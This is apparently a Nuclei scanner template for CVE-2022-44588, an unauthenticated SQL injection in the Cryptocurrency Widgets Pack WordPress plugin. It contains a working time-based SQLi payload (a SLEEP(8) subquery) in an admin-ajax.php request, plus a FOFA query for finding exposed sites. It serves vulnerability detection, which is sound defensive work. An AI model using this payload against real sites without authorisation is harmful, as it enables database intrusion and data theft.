id: CVE-2022-44588

info:
  name: Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion of sensitive information.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44588
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptocurrency-widgets-pack/cryptocurrency-widgets-pack-181-unauthenticated-sql-injection-2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44588
    epss-score: 0.02268
    epss-percentile: 0.80716
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="wp-content/plugins/cryptocurrency-widgets-pack"
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cryptocurrency-widgets-pack,unauth

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains_all(body, "recordsTotal", "recordsFiltered", "draw")'
        condition: and
# digest: 4a0a0047304502200b796fb4bb57a3250bde7591738aee3cdc18efcf81b35ffbc9386c411eb2a06b02210084c38b09e481bb8cd2055268bace225ab86d229bc33b6218dcd5c04dad067c1d:922c64590222798bb761d5b6d8e72950